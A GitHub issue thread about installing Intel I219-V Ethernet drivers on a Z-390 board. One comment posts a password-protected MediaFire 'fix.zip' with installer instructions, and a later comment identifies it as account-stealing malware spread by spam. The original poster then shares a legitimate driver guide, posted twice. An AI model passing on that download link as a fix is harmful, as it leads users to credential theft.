### ISSUE TITLE
I219-V Ethernet

### ISSUE THREAD

**Issue by p000r** [fr33thytweaks/Server-Enterprise-Install-Guide#1]
I219-V Is having the same issues as the other Ethernet drivers. The problem with Z-390 Motherboard LAN Drivers comes with a lot of different INF files and it's very hard to navigate. I've been through different forums and none seem to help. If anyone is having the same issues and found a fix please let me know

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by p000r** [comment]
FIX: for I219-V this forum worked, it also claims it fixes I211, I217-V, & I218-V.
[https://blog.workinghardinit.work/2017/06/19/installing-intel-i211-i217v-i218v-i219v-drivers-windows-server-2016-eufi-boot/](url)
I know this was a specific issue but maybe it might help someone out there.

**Comment by p000r** [comment]
FIX: for I219-V this forum worked, it also claims it fixes I211, I217-V, & I218-V.
[https://blog.workinghardinit.work/2017/06/19/installing-intel-i211-i217v-i218v-i219v-drivers-windows-server-2016-eufi-boot/](url)
I know this was a specific issue but maybe it might help someone out there.
